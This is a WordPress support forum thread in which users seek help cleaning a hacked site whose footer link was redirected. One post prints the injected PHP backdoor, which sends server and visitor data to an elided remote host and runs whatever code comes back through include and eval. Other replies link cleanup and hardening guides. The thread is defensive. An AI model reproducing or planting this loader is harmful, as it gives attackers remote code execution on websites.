WordPress.org

Ready to get started?Download WordPress

Forums

WordPress Link got Hacked (16 posts)

  1. koydin
    Member
    Posted 4 years ago #

    One of my friends footer link got hacked. His Powered by WordPress link points to differrnt url instead of wordpress.org. I searched for exploits on his wordpress theme files.. And found that the hacked used this code to call the hacked URL.

    < ?=@get_wp_results('f');? >

    I can't find the injected code !! where is it databse or somewhere else.. Need help Guys... I am Just a Newb...

  2. koydin
    Member
    Posted 4 years ago #

    any Updates..??

  3. Shane G.
    Member
    Posted 4 years ago #

    Hi,

    Refer this article:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    Thanks,

    Shane G.

  4. mrmist
    Forum Janitor
    Posted 4 years ago #

    Some theme authors change the URLs to point to their theme website. Is it a customised theme?

  5. koydin
    Member
    Posted 4 years ago #

    Its a customized theme. It was pointing to wordpress.org before hack. i searched through internet and found the hacker injected some .php file with this code

    <? error_reporting(0);
    $s="e";
    $a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
    $b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
    $c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
    $d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
    $e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
    $f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
    $g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
    $h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
    $i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
    $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
    $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".". base64_encode($d).".". base64_encode($e).".". base64_encode($f).".". base64_encode($g).".". base64_encode($h).".$s.". base64_encode($i) .".". base64_encode($j);
    if((include(base64_decode("...").base64_decode("...")."/?".$str)));
    else if(include(base64_decode("...").base64_decode("...")."/?".$str));
    else if($c=file_get_contents(base64_decode("...").$str))eval($c);
    else{$cu=curl_init(base64_decode("...").$str);
    curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
    $str=curl_exec($cu);
    curl_close($cu);
    eval($str);
    }; ?>

    I deleted all the files. But his Powered by WordPress link points to differrnt url instead of wordpress.org. I think the hacker injected something in the database.

  6. koydin
    Member
    Posted 4 years ago #

    anyone.. Out there??? to help me out...

  7. koydin
    Member
    Posted 4 years ago #

    I found some base64 code on Wp-admin .. also some new file names. I deleted those files. But no code in the database. Is there any way i can find that..??

  8. Robert Chapin
    Member
    Posted 4 years ago #

    Koydin, your server would have to be badly misconfigured for those hacks to run in the first place, since there is no <?php tag in the code. If I were you, I'd start from scratch with a new server environment and a new copy of all the WordPress files.

  9. Windhamdavid
    Member
    Posted 4 years ago #

    Koydin, have you checked out this thread ~ http://wordpress.org/support/topic/370546 ~ it might be simply a matter of removing/editing the effected files from the backdoor ~ http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

  10. Windhamdavid
    Member
    Posted 4 years ago #

    and most of these are likely related to the same problem you may have ~ http://wordpress.org/tags/base64

  11. dassad
    Member
    Posted 4 years ago #

    koylin, can you help me put with this virus. i got hacked like you. but i don't find the virus untyl now. Can you send me teh code that you found or some help. Thank you. And please hurry whyle all my blogs are hacked at this time on that hostgator server.

  12. Can you send me teh code that you found or some help.

    You've got a lot of work ahead of you. Here is the boiler plate links for delousing your hacked blog.

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

    RVoodoo has written up his experience too.

    http://www.rvoodoo.com/2010/02/the-dreaded-base64-wordpress-hack-and-other-hacks-too/

    Once you've cleaned out your installation, harden it to stop (or at least slow down) this from happening again.

    http://codex.wordpress.org/Hardening_WordPress

    Goof luck.

  13. dassad
    Member
    Posted 4 years ago #

    My problem is that i found the < ?=@get_wp_results('f');? > code only in my footer but i dont found anything untyl now. And is changing my links but my footer don't shows up. for example http://7don.com

  14. dassad
    Member
    Posted 4 years ago #

    So i need to find a modified file or something so i can start to hount it down. But nothing untyl now. I searched in my database, i downloaded my whole website, and searching for "eval" "base64" and thesde tipe of codes in them.

  15. Sorry, but every file in your installation is suspect, as well as your database. That's what it means to be hacked.

    If you want to fix it then you need to replace every file you can with the freshly downloaded original files, hunt through any files you have left, and scour your database.

    Anything less than that won't find it. Once you have found it, then you need to close the door that the attacker came in through.

    It's a metric ton of work but that's what is needed. Once again, good luck. The work is outlined in those links.

  16. dassad
    Member
    Posted 4 years ago #

    Yeah i understand that but untyl i don't find the modified files i don't want to replace anything. I remowed now the injected code from the footers and i'm wayting if will apear again howewer. I still hawe the virus in my sites. If it's not only injected somehow.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags